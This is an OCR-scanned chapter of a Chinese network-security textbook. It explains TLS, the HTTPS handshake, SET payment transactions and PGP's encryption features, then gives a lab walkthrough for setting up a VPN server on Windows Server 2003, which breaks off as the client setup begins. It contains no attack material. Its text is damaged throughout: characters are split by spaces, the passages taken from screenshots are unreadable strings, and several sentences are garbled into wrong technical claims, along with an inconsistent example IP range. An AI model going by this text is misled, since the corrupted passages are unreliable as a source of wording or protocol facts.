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密 性 和 数据 完整 性 。 该 协议 由 两 层 组 成 ， 即 TLS 记录 协议 (TLS Record) 和 TLS 握手 协议 
(TLS Handshake)。 较 低 的 层 为 TLS 记录 协议 ， 位 于 某 个 可 靠 的 传输 协议 (如 TCP) 上 面 ， 与 
具体 的 应 用 无 关 ， 所 以 ， 一 般 把 TLS 协议 归 为 传输 层 安全 协议 。 


4.4.1 TLS 概述 


TLS 协议 包括 两 个 协议 组 ， 即 TLS 记录 协议 和 TLS 握手 协议 。 每 组 具有 很 多 不 同 格 
式 的 信息 。 

TLS 记录 协议 是 一 种 分 层 协议 。 每 一 层 中 的 信息 可 能 包含 长 度 、 描 述 和 内 容 等 字段 。 
记录 协议 支持 信息 传输 、 将 数据 分 段 到 可 处 理 块 、 压 缩 数 据 、 应 用 MAC、 加 密 以 及 传输 结 
果 等 。 对 接收 到 的 数据 进行 解密 、 校 验 、 解 压缩 、 重 组 等 ， 然 后 将 它们 传送 到 高 层 客户 机 。 

TLS 连接 状态 指 的 是 TLS 记录 协议 的 操作 环境 。 它 规定 了 压缩 算法 、 加 密 算法 和 
MAC 算法 。 

TLS 记录 层 从 高 层 接收 任意 大 小 无 空 块 的 连续 数据 。 密 钥 计 算 : 记录 协议 通过 算法 从 
握手 协议 提供 的 安全 参数 中 产生 密 钥 、IV 和 MAC 密 钥 。TLS 握手 协议 由 3 个 子 协议 组 构 
成 ， 允 许 对 等 双方 在 记录 层 的 安全 参数 上 达成 一 致 、 自 我 认证 、 例 示 协 商 安全 参数 、 互 相 
报告 出 错 条 件 。 

TLS 握手 协议 : @ 改 变 密码 规格 协议 ;@@ 警 惕 协议 ; 图 握手 协议 。 


4.4.2 TLS 的 特点 


TLS 记录 协议 提供 的 连接 安全 性 具有 以 下 两 个 基本 特性 。 
@ 私有 。 对 称 加 密 用 以 数据 加 密 (DES、RC4 等 )。 对 称 加 密 所 产生 的 密 钥 对 每 个 连接 
都 是 唯一 的 ， 且 此 密 钥 基于 另 一 个 协议 (如 握手 协议 ) 协 商 。 记 录 协 议 也 可 以 不 加 密使 用 。 
@ 可 靠 。 信 息 传 输 包 括 使 用 密 钥 的 MAC 进行 信息 完整 性 检查 。 安 全 哈 希 功能 
(SHA、MD5 等 ) 用 于 MAC 计算 。 记 录 协 议 在 没有 MAC 的 情况 下 也 能 操作 ， 但 一 般 只 能 
用 于 这 种 模式 ， 即 有 另 一 个 协议 正在 使 用 记录 协议 传输 协商 安全 参数 。 
TLS 握手 协议 提供 的 连接 安全 具有 3 个 基本 属性 。 
(1) 可 以 使 用 非 对 称 的 或 公共 密 钥 的 密码 术 来 认证 对 等 方 的 身份 。 该 认证 是 可 选 的 ， 
但 至 少 需要 一 个 节点 方 。 
(2) 共享 加 密 密 钥 的 协商 是 安全 的 。 对 偷窃 者 来 说 协商 加 密 是 难以 获得 的 。 此 外 ， 经 
过 认证 过 的 连接 不 能 获得 加 密 ， 即 使 是 进入 连接 中 间 的 攻击 者 也 不 能 。 
(3) 协商 是 可 靠 的 。 没 有 经 过 通信 方 成 员 的 检测 ， 任 何 攻击 者 都 不 能 修改 通信 协商 。 
但 是 TLS 的 最 大 优势 就 在 于 : TLS 是 独立 于 应 用 协议 。 高 层 协 议 可 以 透明 地 分 布 在 TLS 
协议 上 面 。 然 而 ，TLS 标准 并 没有 规定 应 用 程序 如 何在 TLS 上 增加 安全 性 ; 它 把 如 何 启动 
TLS 握手 协议 以 及 如 何 解释 交换 的 认证 证 书 的 决定 权 留 给 协议 的 设计 者 和 实施 者 来 判断 。 


4.4.3 TLS 的 典型 应 用 


HTTPS(Hypertext Transfer Protocol over Secure Socket Layer) 是 SSL/TLS 协议 的 一 个 


-on 


Nl mm 计算 机 网 络 信息 安全 (第 僵 版 ) 


最 典型 的 应 用 ， 在 应 用 层 的 HTTP 协议 和 传输 层 之 间 加 入 了 安全 协议 ， 使 得 原本 明文 传输 
的 HITP 协议 具有 了 保密 、 校 验 、 认 证 的 安全 功能 。 在 握手 成 功 建立 连接 后 ， 双 方 的 通信 
基本 上 就 是 HTTP 通信 了 ， 只 是 通过 SSL/TLS 的 记录 协议 层 ， 将 内 容 用 协商 好 的 对 称 密 钥 
进行 加 密 。 一 个 标准 的 HITP 连接 使 用 80 端口 。HTTPS 协议 的 使 用 是 以 https:// 作 为 协议 
前 级， 默认 端口 是 443。 在 一 个 浏览 器 用 户 看 来 ， 它 们 的 主要 区 别 表 现在 URL 地 址 开始 于 
https:// 而 不 是 http://。 

当 使 用 HTTPS 时 ， 通 信 的 以 下 元 素 被 加 密 。 

(1) 要 求 的 文件 的 URL。 

(2) 文件 的 内 容 。 

(3) 浏览 器 表单 的 内 容 ( 由 浏览 器 的 使 用 者 填写 )。 

(4) 从 浏览 器 发 送 到 服务 器 和 从 服务 器 发 送 到 浏览 器 的 Cookie。 

(5) HTTP 标题 的 内 容 。 

HTTPS 记录 在 RFC2818，HTTP 则 在 TLS。 基 于 SSL 或 TLS 使 用 HTTP 并 没有 本 质 
上 的 区 别 ， 并 且 两 者 的 执行 都 被 称 为 HTTPS。TLS/SSL 中 使 用 了 非 对 称 加 密 、 对 称 加 密 以 
及 Hash 算法 。 

HTTPS 在 传输 数据 之 前 需要 客户 端 (浏览 器 ) 与 服务 端 (网 站 ) 之 间 进 行 一 次 握手 ， 在 握 
手 过 程 中 将 确立 双方 加 密 传输 数据 的 密码 信息 。HTTPS 的 工作 原理 如 下 。 

(1) 浏览 器 将 自己 支持 的 一 套 加 密 规则 发 送 给 网 站 。 

(2) 网 站 从 中 选 出 一 组 加 密 算法 与 Hash 算法 ， 并 将 自己 的 身份 信息 以 证 书 的 形式 发 
给 浏览 器 。 证 书 里 面包 含 了 网 站 地 址 、 加 密 公 钥 以 及 证 书 的 颁发 机 构 等 信息 。 

(3) 获得 网 站 证 书 之 后 浏览 器 要 做 以 下 工作 。 

Q@ 验证 证 书 的 合法 性 (颁发 证 书 的 机 构 是 否 合法 ， 证 书 中 包含 的 网 站 地 址 是 否 与 正在 
访问 的 地 址 一 致 等 )， 如 果 证 书 受 信任 ， 则 浏览 器 栏 里 面 会 显示 一 个 小 锁 头 ， 否 则 会 给 出 证 
书 不 受信 任 的 提示 。 

@ 如 果 证 书 受 信任 ， 或 者 是 用 户 接受 了 不 受信 任 的 证 书 ， 浏 览 器 会 生成 一 串 随 机 数 
的 密码 ， 并 用 证 书 中 提供 的 公 钥 加 密 。 

@ 使 用 约定 好 的 Hash 计算 握手 消息 ， 并 使 用 生成 的 随机 数 对 消息 进行 加 密 ， 最 后 将 
之 前 生成 的 所 有 信息 发 送 给 网 站 。 

(4) 网 站 接收 浏览 器 发 来 的 数据 之 后 要 做 以 下 操作 。 

@ 使 用 自己 的 私 钥 将 信息 解密 取出 密码 ， 使 用 密码 解密 浏览 器 发 来 的 握手 消息 ， 并 
验证 Hash 是 否 与 浏览 器 发 来 的 一 致 。 

@ 使 用 密码 加 密 一 段 握手 消息 ， 发 送 给 浏览 器 。 

(5) 浏览 器 解密 并 计算 握手 消息 的 Hash， 如 果 与 服务 端 发 来 的 Hash 一 致 ， 此 时 担子 
过 程 结束 ， 之 后 所 有 的 通信 数据 将 由 之 前 浏览 器 生成 的 随机 密码 并 利用 对 称 加 密 算法 进行 
加 密 。 

这 里 浏览 器 与 网 站 互相 发 送 加 密 的 握手 消息 并 验证 ， 目 的 是 为 了 保证 双方 都 获得 了 一 
致 的 密码 ， 并 且 可 以 正常 地 加 密 、 解 密 数据 ， 为 后 续 真 正 数据 的 传输 做 一 次 测试 。 


加 
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4.5 ”安全 电子 交易 SET 


安全 电子 交易 SET 是 专 为 在 Intemet 上 进行 安全 信用 卡 交易 的 协议 。 它 最 初 是 由 两 个 
著名 信用 卡 公司 Visa 和 MasterCard 于 1996 年 开发 的 ， 世 界 上 许多 具有 领先 技术 的 公司 也 
参与 了 。1997 年 年 底 成 立 了 实体 SETCo， 目 的 是 在 全 球 推 广 使 用 SET。 


1. SET 的 特点 及 交易 构成 


1) SET 的 主要 特点 如 下 

(1) SET 是 专 为 与 支付 有 关 的 报 文 进 行 加 密 的 ， 它 不 能 像 SSL 那样 对 任意 的 数据 (如 正 
文 或 图 像 ) 进 行 加 密 。 

(2) SET 协议 涉及 三 方 ， 即 顾客 、 商 家 和 商业 银行 。 所 有 在 这 三 方 之 间 交 互 的 敏感 信 
息 都 被 加 密 。 

(3) SET 要 求 三 方 都 有 证 书 。 在 SET 交易 中 ， 商 家 看 不 见 顾客 传送 给 商业 银行 的 信用 
卡号 码 。 这 是 SET 的 一 个 最 关键 的 特性 。 

2) SET 交易 中 使 用 的 软件 

在 一 个 SET 交易 中 要 使 用 以 下 3 个 软件 。 

(1) 浏览 器 钱包 。 这 个 软件 集成 在 浏览 器 中 ， 它 为 顾客 在 购物 时 提供 信用 卡 和 证 书 的 
存储 和 管理 的 地 方 ， 并 响应 从 商家 发 来 的 SET 报 文 ， 提 示 顾 客 选择 信用 卡 进行 支付 。 

(2) 商家 服务 器 。 这 是 在 万 维 网 上 提供 商品 交易 的 实现 引擎 。 它 处 理 持 卡 人 的 交易 ， 
并 与 商业 银行 通信 。 

(3) 支付 网 关 (Acquirer Gateway)。 这 是 商业 银行 使 用 的 软件 ， 处 理 信用 卡 的 交易 ， 包 
括 授权 和 支付 ， 是 个 相当 复杂 的 软件 。 


2. SET 的 工作 原理 


下 面 以 顾客 B 到 公司 A 用 SET 购买 物品 为 例 来 说 明 SET 的 工作 原理 。 这 里 涉及 两 个 
银行 ， 即 A 的 银行 (公司 A 的 支付 银行 ) 和 B 的 银行 (给 B 发 出 信用 卡 的 银行 )。 

(1) B 告诉 A 他 想 用 信用 卡 购买 公司 A 的 物品 。 

(2) A 将 物品 清单 和 一 个 唯一 的 交易 标识 符 发 送 给 B。 

(3) A 将 其 商家 的 证 书包 括 商家 的 公开 密 钥 发 送 给 B。A 还 向 B 发 送 其 银行 的 证 书 
包括 银行 的 公开 密 钥 。 这 两 个 证 书 都 用 一 个 认证 中 心 CA 的 私有 密 钥 进行 加 密 。 

(4) B 使 用 认证 中 心 CA 的 公开 密 钥 对 这 两 个 证 书 解密 。 于 是 B 有 了 A 的 公开 密 钥 和 
A 的 银行 的 公开 密 钥 。 

(5) B 生成 两 个 数据 包 : 给 A 用 的 订货 信息 OI(Order Information) 和 给 A 的 银行 用 的 购 
买 指 令 PI(Purchase Instruction)。0OI 包括 交易 标识 符 和 将 要 使 用 的 信用 卡 类 别 ， 但 不 包含 B 
的 信用 卡号 码 。PI 则 包括 交易 标识 符 、B 的 信用 卡号 码 以 及 B 同意 向 A 付出 的 款 数 。OI 
用 A 的 公开 密 钥 加 密 ， 而 PI 用 A 的 银行 的 公开 密 钥 加 密 。B 将 加 密 后 的 OI 和 PI 发 送 给 
A。 请 注意 ，PI 虽然 是 给 A 的 银行 用 的 ， 但 并 不 是 由 B 直接 发 送 给 A 的 银行 。 

(6) A 生成 对 信用 卡 支付 请 求 (Payment Request) 的 授权 请 求 (Authorization Request)， 它 
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包括 交易 标识 符 。 

(7) A 用 银行 的 公开 密 钥 将 一 个 报 文 加 密 发 送 给 银行 ， 此 报 文 包括 授权 请 求 、 从 B 发 
过 来 的 PI 数据 包 以 及 A 的 证 书 。 

(8) A 的 银行 收 到 此 报 文 ， 将 其 解密 。A 的 银行 要 检查 此 报 文 有 无 被 算 改 ， 以 及 检查 在 
授权 请 求 中 的 交易 标识 符 是 否 与 B 的 PI 数据 包 给 出 的 一 致 。 

(9) A 的 银行 通过 传统 的 银行 信用 卡 信 道 向 B 的 银行 发 送 请 求 支付 授权 的 报 文 。 

(10) B 的 银行 准许 支付 后 ，A 的 银行 就 向 A 发 送 加 密 的 响应 。 此 响应 包括 交易 标识 符 。 

(11) 若 此 次 交易 被 批准 ，A 就 向 B 发 送 响应 报 文 。 此 报 文 作 为 收据 ， 并 通知 B: 
“支付 已 被 接受 ， 所 购物 品 即 将 发 出 ”。 

SET 特点 中 很 重要 的 一 点 就 是 购物 人 的 信用 卡号 码 不 向 商家 暴露 。 注 意 到 在 上 面 的 第 
(5) 项 中 ，B 使 用 银行 的 密 钥 对 其 信用 卡号 码 加 密 。 


4.6 ”PGP 协议 


PGP(Pretty Good Privacy， 更 好 地 保护 隐私 ) 是 一 个 基于 RSA 公 是 加 密 体系 的 邮件 加 
密 软件 。 可 以 用 它 对 邮件 保密 以 防止 非 授权 者 阅读 ， 它 还 能 对 邮件 加 上 数字 签名 ， 从 而 使 
收 信 人 可 以 确认 邮件 的 发 送 者 ， 并 能 确信 邮件 没有 被 算 改 。 它 可 以 提供 一 种 安全 的 通信 方 
式 ， 而 事先 并 不 需要 任何 保密 的 渠道 用 来 传递 密 钥 。 它 采用 了 一 种 RSA 和 传统 加 密 的 杂 
合算 法 ， 用 于 数字 签名 的 邮件 文摘 算法 、 加 密 前 压缩 等 ， 还 有 一 个 良好 的 人 机 工程 设计 。 
它 的 功能 强大 ， 有 很 快 的 速度 。 而 且 它 的 源 代码 是 免费 的 。 


4.6.1 功能 


PGP 使 用 加 密 及 校 验方 式 ， 提 供 了 多 种 功能 和 工具 ， 帮 助 保证 电子 邮件 、 文 件 、 磁 盘 
以 及 网 络 通信 的 安全 。 可 以 使 用 PGP 做 以 下 事情 。 

(1) 在 任何 软件 中 进行 加 密 /签名 以 及 解密 / 校 验 。 通 过 PGP 选项 和 电子 邮件 插件 ， 可 
以 在 任何 软件 中 使 用 PGP 的 功能 

(2) 创建 以 及 管理 密 钥 。 使 用 PGPkeys 来 创建 、 查 看 和 维护 PGP 密 钥 对 ;以 及 把 任 
何人 的 公 钥 加 入 公 钥 库 中 。 

(3) 创建 自 解密 压缩 文档 (Self-Decrypting Archives，SDA)。 可 以 建立 一 个 自动 解密 的 
可 执行 文件 。 任 何人 不 需要 事先 安装 PGP， 只 要 得 知 该 文件 的 加 密 密 码 ， 就 可 以 把 这 个 文 
件 解密 。 这 个 功能 尤其 在 需要 把 文件 发 送 给 没有 安装 PGP 的 人 时 特别 好 用 。 并 且 ， 此 功 
能 还 能 对 内 嵌 其 中 的 文件 进行 压缩 ， 压 缩 率 与 ZIP 相似 ， 比 RAR 略 低 ( 某 些 时 候 略 高 ， 比 
如 含有 大 量 文本 时 )。 

(4) 创建 PGPdisk 加 密 文件 。 该 功能 可 以 创建 一 个 .pgd 的 文件 ， 此 文件 用 PGP Disk 功 
能 加 载 后 ， 将 以 新 分 区 的 形式 出 现 ， 可 以 在 此 分 区 内 放 入 需要 保密 的 任何 文件 。 其 使 用 私 
钥 和 密码 两 者 共用 的 方式 保存 加 密 数 据 ， 保 密 性 坚不可摧 。 但 需要 注意 的 是 ， 一 定 要 在 重 
装 系统 前 记得 备份 “我 的 文档 ”中 的 “PGP” 文 件 夹 里 的 所 有 文件 ， 以 备 重 装 后 恢复 私 
钥 ; 否则 将 永远 没有 可 能 再 次 打开 曾经 在 该 系统 下 创建 的 任何 加 密 文件 。 
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(5) 永久 的 粉碎 销毁 文件 、 文 件 夹 ， 并 释放 出 磁盘 空间 。 可 以 使 用 PGP 粉碎 工具 来 永 
久 地 删除 那些 敏感 的 文件 和 文件 夹 ， 而 不 会 遗留 任何 的 数据 片段 在 硬盘 上 。 也 可 以 使 用 
PGP 自由 空间 粉碎 器 来 再 次 清除 已 经 被 删除 的 文件 实际 占用 的 硬盘 空间 。 这 两 个 工具 都 是 
要 确保 所 删除 的 数据 将 永远 不 可 能 被 别有用心 的 人 恢复 。 

(6) 全 盘 加 密 ， 也 称 完整 磁盘 加 密 。 该 功能 可 将 整个 硬盘 上 所 有 数据 加 密 ， 甚 至 包括 
操作 系统 本 身 。 提 供 极 高 的 安全 性 ， 没 有 密码 之 人 绝 无 可 能 使 用 您 的 系统 或 查看 硬盘 里 面 
存放 的 文件 、 文 件 夹 等 数据 。 即 便 是 硬盘 被 拆卸 到 另外 的 计算 机 上 ， 该 功能 仍 将 忠实 地 保 
护 数 据 、 加 密 后 的 数据 维持 原 有 的 结构 ， 文 件 和 文件 夹 的 位 置 都 不 会 改变 。 

(7) 即时 消息 工具 加 密 。 该 功能 可 将 支持 的 即时 消息 工具 QM， 也 称 即 时 通信 工具 、 聊 
天 工具 ) 所 发 送 的 信息 完全 经 由 PGP 处 理 ， 只 有 拥有 对 应 私 钥 的 和 密码 的 对 方才 可 以 解 开 
消息 的 内 容 。 任 何人 截获 到 也 没有 任何 意义 ， 仅 仅 是 一 堆 乱 码 。 

(8) PGP 压缩 包 。 该 功能 可 以 创建 类 似 其 他 压缩 软件 打包 压缩 后 的 文件 包 ， 但 不 同 的 
是 其 拥有 坚 不 可 挫 的 安全 性 。 

(9) 网 络 共 享 。 可 以 使 用 PGP 接管 共享 文件 夹 本 身 以 及 其 中 的 文件 ， 安 全 性 远 远 高 于 
操作 系统 本 身 提 供 的 账号 验证 功能 。 并 且 可 以 方便 地 管理 允许 的 授权 用 户 进行 的 操作 。 极 
大 地 方便 了 需要 经 常 在 内 部 网 络 中 共享 文件 的 企业 用 户 ， 免 于 受 蠕 虫 病毒 和 黑客 的 侵袭 。 

(10) 创建 可 移动 加 密 介 质 (USB/CD/DVD) 产 品 一 一 PGP Portable。 曾 经 独立 的 该 产品 已 
包含 在 其 中 ， 但 使 用 时 需要 另 购 许可 证 。 


4.6.2 ”电子 邮件 加 密 


寄 出 的 电子 邮件 内 容 会 不 会 被 人 窃取 ， 会 不 会 收 到 伪 冒 的 电子 邮件 ， PGP 可 以 自动 
地 帮助 做 E-mail 加 密 及 签 章 。 
可 以 自己 设 定 各 种 安全 政策 ， 如 收 件 人 是 谁 、 主 旨 内 容 为 何 时 就 需要 加 密 与 签 章 ， 其 
他 情况 可 以 只 签 章 (证 明 这 信和 是 本 人 发 的 ) 而 不 加 密 ; 只 要 勾 选 PGP Mail Proxy Service 复 选 
框 ，PGP 就 依照 设 定 的 政策 自动 执行 ，PGP 会 找 出 收 件 人 的 公 钥 ， 使 用 此 公 钥 来 加 密 邮 件 
内 容 ， 再 用 自己 的 私 钥 来 签 章 这 邮件 ， 对 方 PGP 收 到 这 邮件 时 ， 会 先 用 你 的 公 钥 来 验证 这 
邮件 确 是 你 寄 出 的 ， 然 后 用 他 自己 的 私 钥 来 解 开 这 邮件 内 容 。 所 有 这 些 动 作 都 由 PGP 在 背 
后 自动 执行 。 

也 可 以 不 用 PGP Mail Proxy Service， 自 己 先 用 Notepad 之 类 的 工具 编写 邮件 内 文 ， 然 
后 按 PGP Icon 选择 [Current Window]， 再 选择 [Encrypt & Sign] 或 [Encrypt]， 就 会 出 现 
计算 机 里 所 有 公 钥 的 人 让 人 选择 ， 可 以 选取 多 个 人 ， 这 些 人 就 是 可 以 解密 你 加 密 的 内 容 。 

如 果 只 是 将 附件 文件 加 密 ， 如 一 张 自 拍照 (图 档 ) 或 是 研发 中 的 CAD/CAM 文档 或 是 一 
般 机 密 的 Office 档案 ， 可 以 直接 在 档案 总 管 下 单 击 鼠 标 右键 ， 选 择 快捷 菜单 中 的 PGP 
Desktop 一 Secure ... with key... 命 令 ，PGP 窗口 跳出 选择 可 解 开 此 加 密 档 的 人 ( 金 钥 )， 这 档 
案 就 被 加 密 。 
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4.6.3 ”虚拟 磁盘 驱动 器 


如 果 只 是 想 要 加 密 计算 机 里 的 私密 数据 ， 除 了 本 人 (或 加 上 指定 的 人 ) 没 有 其 他 人 可 以 
解密 这 些 数据 。 所 以 即使 计算 机 遗失 、 计 算 机 被 盗用 甚至 检 调 单位 来 搜 ， 也 不 用 担心 这 些 
私密 资料 外 泄 。 通 常 ， 最 安全 的 方法 伴随 的 是 不 方便 使 用 ， 但 是 PGP 的 虚拟 磁盘 驱动 器 加 
密 功 能 可 以 既 安 全 又 好 用 。 

可 以 指定 硬盘 某 空间 来 做 加 密 磁盘 驱动 器 ， 在 这 磁盘 驱动 器 里 的 档案 及 数据 夹 都 是 力 
密 过 的 ， 只 有 自己 或 是 被 指定 可 出 示 私 钥 或 使 用 者 代号 密码 才能 解密 这 些 数据 。 任 何 认 为 
机 密 的 档案 都 可 以 摆 到 里 面 ， 加 过 密 的 磁盘 其 操作 如 同一 般 档案 总 管 ， 依 旧 使 用 Word、 
Excel、Photoshop 等 软件 包 或 应 用 程序 来 打开 它 ， 完 全 不 受 影 响 ， 因 为 PGP 自动 处 理 进出 
这 磁盘 驱动 器 的 加 解密 工作 。 

电子 邮件 软件 如 Outlook、Outlook Express 等 ， 无 论 是 收 件 匣 或 寄 件 备份 ， 其 实 都 是 
档案 而 已 ， 如 Outlook 是 .pst 文件 ， 这 些 电子 邮件 档案 通常 包括 很 多 机 密 内 容 。 


4.6.4 ”加 密 与 压缩 功能 


如 果 只 是 想 将 部 分 目录 或 档案 加 密 然后 传 给 别人 (E-mail 或 FTP 等 )， 当 然 可 以 用 
WinZip 或 WinRAR 等 工具 里 的 密码 保护 ， 但 其 加 密 算法 较 弱 ， 同 时 密码 也 可 能 被 猜 到 ， 
这 对 于 要 传送 极 机 密 的 档案 数据 是 有 风险 的 。PGP 则 提供 较 高 安全 的 类 似 工 具 ， 如 果 对 方 
有 PGP， 应 该 使 用 对 方 的 公 钥 来 加 密 ， 如 果 要 将 加 密 文档 送 给 多 人 ， 就 加 入 多 个 公 钥 ， 扫 
有 任何 一 个 公 钥 所 对 应 的 私 钥 可 以 解密 这 些 档 案 ， 这 是 使 用 RSA 2048bit 加 密 算法 (内 定 )， 
所 以 比较 安全 ， 加 完 密 后 再 用 自己 的 私 钥 来 签 章 ，PGP 同时 帮 你 将 档案 压缩 。 

如 果 对 方 没有 PGP 时 ， 可 以 使 用 SelfDecrypting Archive(SDA)，PGP 会 要 求 输入 加 密 
密码 ， 然 后 使 用 这 密码 来 加 密 档案 ， 并 产生 可 自动 解密 的 执行 文档 ， 当 然 ， 必 须 男 外 告知 
对 方 解 密 的 密码 。 


4.7 上 机 实践 
4.7.1 在 Windows 2003 Server SP2 上 配置 VPN 服务 器 的 过 程 


(1) 打开 “路 由 和 远程 访问 服务 器 安装 向 导 ” 窗 口 。 

依次 进入 “开始 ”一 “程序 ”一 “管理 工具 ”一 “路 由 和 远程 访问 ”， 打 开 “ 路 由 和 
远程 访问 ”控制 台 ， 如 图 4.9 所 示 。 右 键 单 击 左 边 列表 中 的 “ZTG2003( 本 地 )”(ZTG2003 
为 服务 器 名 )， 选 择 快捷 菜单 中 的 “配置 并 启用 路 由 和 远程 访问 ”命令 ， 打 开 “ 路 由 和 远程 
访问 服务 器 安装 向 导 ” 对 话 框 ， 如 图 4.10 所 示 。 
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2 路 由 和 远程 访问 本 加 区 
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图 4.9 “路 由 和 远程 访问 ”控制 台 图 4.10 “路 由 和 远程 访问 服务 器 安装 向 导 ” 对 话 框 


(2) 选择 网 络 接口 。 在 图 4.10 中 ， 选 中 “远程 访问 (拨号 或 VPN)” 单 选 按钮 ， 然 后 单 
击 “ 下 一 步 ” 按 钮 ， 弹 出 图 4.11 所 示 的 对 话 框 ， 选 中 VPN 单 选 按钮 ， 然 后 单 击 “ 下 一 


步 ” 按 钮 ， 弹 出 图 4.12 所 示 的 对 话 框 ， 选 择 网 络 接口 (本 实验 选择 192.168.10.1)， 然 后 单 
“下 一 步 ” 按 钮 ， 弹 出 图 4.13 所 示 的 对 话 框 。 


二 各 态 问 a 
个 可 忆 各 轩 雍 和 路 接 天 扶 叶 按 和 WP 所 Da| = 
| vm 吉 户 此 最 和 器 ,至少 要 有 一 个 全 D 洒 拉 下 站 有 可] 
过 和 此 各 务 近 拉 到 nt et 的 网 插口。 
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加 IT 


进 辽 这 村 如 效 拓 但 征 过 峰 来 对 全 择 90 阳 口 进行 侣 护 公 | 
蔡 坟 数据 名 入 这 台 只 万 疼 VIF 项 计 过 此 定 队 探访 癌 几 各 各， 


《上 - 步 因 [ 下 -和 加 下。 取消 


而 | 
图 4.11 远程 访问 图 4.12 VPN 连接 


(3) 指定 瑟 地 址 。 在 图 4.13 中 ， 要 为 远程 VPN 客户 端 指定 IP 地 址 。 默 认 选 项 为 “ 自 
动 ”， 由 于 本 机 没有 配置 DHCP 服务 器 ， 因 此 需要 改选 为 “来 自 一 个 指定 的 地 址 范围 ” 单 
选 按钮 ， 然 后 单 击 “ 下 一 步 ” 按 钮 ， 弹 出 图 4.14 所 示 的 “新 建 地 址 范围 ”对 话 框 ， 在 该 对 
话 框 可 以 为 VPN 客户 机 指定 所 分 配 的 他 地 址 范围 。 比 如 分 配 的 卫 地 址 范围 为 
192.168.10.100 一 192.168.10.200， 然 后 单 击 “ 确 定 ”按钮 ， 弹 出 图 4.15 所 示 的 对 话 框 。 

此 时 需 注意 ， 不 可 以 将 本 身 的 他 地址 (192.168.10.1) 包 含 进去 


(ionN. 
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"Mesut attsza。 Due 
做 想 如 休 对 迄 程 考 户 济 沸 涯 I 地 直 ? 
“gad re re FE 局 本 
© RT 输入 一 个 起 始 IP 地 址 , 和 结束 IP 地 址 或 范围 中 的 地 址 数 。 


起 始 IF 地 址 @): 192. 168. 10 . 10 
结束 IF 地 址 邓 ): 192.168. 10 . 200| 


地 址 数 中 : 101 


ET 
图 4.13 指定 IP 地 址 图 4.14 指定 IP 地 址 范围 


外 注意 : ”这 些 IP 地 址 将 分 配给 VPN 服务 器 和 VPN 客户 机 。 为 了 确保 连接 后 的 VPN 
网 络 能 同 VPN 服务 器 原 有 局 域 网 正常 通信 ， 它 们 必须 同 VPN 服务 器 的 卫 
地 址 处 在 同一 个 网 段 中 。 即 假设 VPN 服务 器 IP 地 址 为 192.168.0.1， 则 此 范 
围 中 的 瑟 地 址 均 应 该 以 192.168.0 开头 。 单 击 “ 确 定 ” 按 钮 ， 然 后 单 击 “下 
一 步 ”按钮 继续 。 


(4) 结束 VPN 服务 器 的 配置 。 在 图 4.15 中 ，“ 管 理 多 个 远程 访问 服务 器 ”界面 用 于 设 
置 集 中 管理 多 个 VPN 服务 器 。 默 认 选 项 为 “ 否 ， 使 用 路 由 和 远程 访问 来 对 连接 请 求 进行 
身份 验证 ” 单 选 按钮 ， 不 用 修改 ， 直 接 单 击 “ 下 一 步 ” 按 钮 。 弹 出 图 4.16 所 示 的 对 话 框 ， 
直接 单 击 “ 完 成 ”按钮 。 此 时 屏幕 上 将 出 现 一 个 名 为 “正在 启动 路 由 和 远程 访问 服务 ”的 
小 窗口 ， 过 一 会 儿 将 自动 返回 “路 由 和 远程 访问 ”控制 台 ， 弹 出 图 4.17 所 示 的 对 话 框 ， 即 
结束 了 VPN 服务 器 的 配置 工作 。 


首 理 多 个 远程 沪 问 最 务 加 正在 完成 呈 白 和 让 各 访问 服务 详 雪 半身 导 
有 了 


CALS) 


BM 


做 马上 功 志 开路 由 和 远程 访 问 最 劳 器 安 半身 导 。 


ee | 客户 认 提 定 到 直列 同 络 以 钼 相 地 接 2 


悠 想 设置 夫 服务 路 与 AITUS 服务 器 一 起 工作 三? 了 和 接 钉 失 贡 并 身 丛 验 证 ， 沁 用 .此 计算 机 的 


A ee 


个 是 ,设置 此 服务 吕 与 MIIUS 服务 器 一 起 工作 位 ) 


在 客户 第 可 以 并 近 前 ， 风 须 在 过 寺 世 通 往 Ative 了 iz: 
i 


请 捍 而 “完成 " 来 关闭 此 向 导 。 


mA | 
图 4.15 管理 多 个 远程 访问 服务 器 4.16 ”完成 VPN 服务 器 的 配置 


说 明 : 此 时 “路 由 和 远程 访问 ”控制 台 ( 图 4.17) 中 的 “路 由 和 远程 访问 ”服务 已 经 
处 于 “已 启动 ”状态 ; 而 在 “网 络 和 拨号 连接 ”窗口 中 也 会 多 出 一 个 “ 传 入 
的 连接 ”图 标 。 
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路 由 和 运程 访问 
文件 中。 操作 个) 可 看 QW) 帮助 0D 
CE 


路 由 和 远程 访问 远程 访问 客户 篇 (1) 
服务 器 状态 


图 4.17 “路 由 和 远程 访问 ”控制 台 


(5) 赋予 用 户 拨 入 权限 。 默 认 情况 下 ， 包 括 Administrator 用 户 在 内 的 所 有 用 户 均 被 拒 
绝 拨 入 到 VPN 服务 器 上 ， 因 此 需要 为 相应 用 户 赋予 氢 入 权限 。 下 面 以 Administrator 用 户 为 
例 进 行 介绍 。 

@ 在 “我 的 电脑 ”处 单 击 右键 ， 选 择 快捷 菜单 中 的 “管理 ”命令 ， 打 开 “ 计 算 机 管 
理 ” 控 制 台 ， 如 图 4.18 所 示 。 


文件 四 毁 作 邮 )， 查看 WD 宣 口 加 帮助 op | =l@lzl 


生字 | 名 四 |X 印 轨 | 巷 轩 


计算 机 管理 (本地) 站 
日 记忆 MI 具 


由 全 事件 查看 器 洪 采 宾 态 问 针 复 机 或 访问 城 的 内 
四 因 共 训 文件 天 本 名 访问 Internet 信息 服务 的 
日 二 本地 用 户 和 姐 用 于 启动 进程 外 应 用 程序 的 Int 

司 用 户 这 是 一 个 帮助 和 支持 服务 的 提供 


贸 组 
| 


1 
图 4.18 “计算 机 管理 ”控制 台 


@ 在 左边 列表 中 依次 展开 “本 地 用 户 和 组 ”一 “用 户 ”， 在 右边 列表 中 双击 
Administrator 打开 Administrator 属性 对 话 框 ， 弹 出 “Administrator 属性 ”对 话 框 。 切 换 到 
“ 拨 入 ”选项 卡 ， 在 “远程 访问 权限 ( 拨 入 或 VPN)” 选 项 组 中 默认 选项 为 “通过 远程 访问 
策略 控制 访问 ”， 改 选 为 “允许 访问 ” 单 选 按钮 ， 然 后 单 击 “确定 ”按钮 返回 “计算 机 管 
理 ” 控 制 台 ， 即 结束 了 赋予 Administrator 用 户 拨 入 权限 的 工作 ， 如 图 4.19 所 示 。 


Wm | ao | 
图 4.19 “ 拨 入 ”选项 卡 


/oN. 


mm 计算 机 网 络 信息 安全 (第 2 版 ) 


4.7.2 VPN 客户 机 (WinXP) 的 配置 过 程 


